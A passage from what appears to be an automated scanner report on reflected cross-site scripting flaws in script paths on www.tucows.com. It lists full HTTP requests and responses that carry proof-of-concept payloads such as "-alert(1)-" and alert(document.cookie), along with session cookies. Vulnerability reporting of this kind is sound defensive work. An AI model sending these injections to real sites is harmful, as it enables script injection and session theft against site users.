User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes5361f"-alert(1)-"5652dc7710f/js/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.121. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e1"-alert(1)-"042603f8178 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/jsb38e1"-alert(1)-"042603f8178/show_layer.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/jsb38e1"-alert(1)-"042603f8178/show_layer.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.122. http://www.tucows.com/includes/js/show_layer.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/show_layer.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ec8"-alert(1)-"817640c3898 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/show_layer.js82ec8"-alert(1)-"817640c3898 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:55 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/show_layer.js82ec8"-alert(1)-"817640c3898";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.123. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da601"-alert(1)-"3c77224e1a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesda601"-alert(1)-"3c77224e1a9/js/signupin.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesda601"-alert(1)-"3c77224e1a9/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.124. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e58a"-alert(1)-"92953272be5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js7e58a"-alert(1)-"92953272be5/signupin.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js7e58a"-alert(1)-"92953272be5/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.125. http://www.tucows.com/includes/js/signupin.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/signupin.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee858"-alert(1)-"2b00b808463 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/signupin.jsee858"-alert(1)-"2b00b808463 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/signupin.jsee858"-alert(1)-"2b00b808463";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.126. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65747"-alert(1)-"fdf529e6e6b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes65747"-alert(1)-"fdf529e6e6b/js/x_core.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes65747"-alert(1)-"fdf529e6e6b/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.127. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18d3d"-alert(1)-"9fd657fe3af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js18d3d"-alert(1)-"9fd657fe3af/x_core.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js18d3d"-alert(1)-"9fd657fe3af/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.128. http://www.tucows.com/includes/js/x_core.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/x_core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b794b"-alert(1)-"c38b7601809 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/x_core.jsb794b"-alert(1)-"c38b7601809 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/js/x_core.jsb794b"-alert(1)-"c38b7601809";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.129. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80391"-alert(1)-"2da181f97ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes80391"-alert(1)-"2da181f97ad/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes80391"-alert(1)-"2da181f97ad/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.130. http://www.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e49a"-alert(1)-"bcc9c43802 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js8e49a"-alert(1)-"bcc9c43802/xdocsize.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
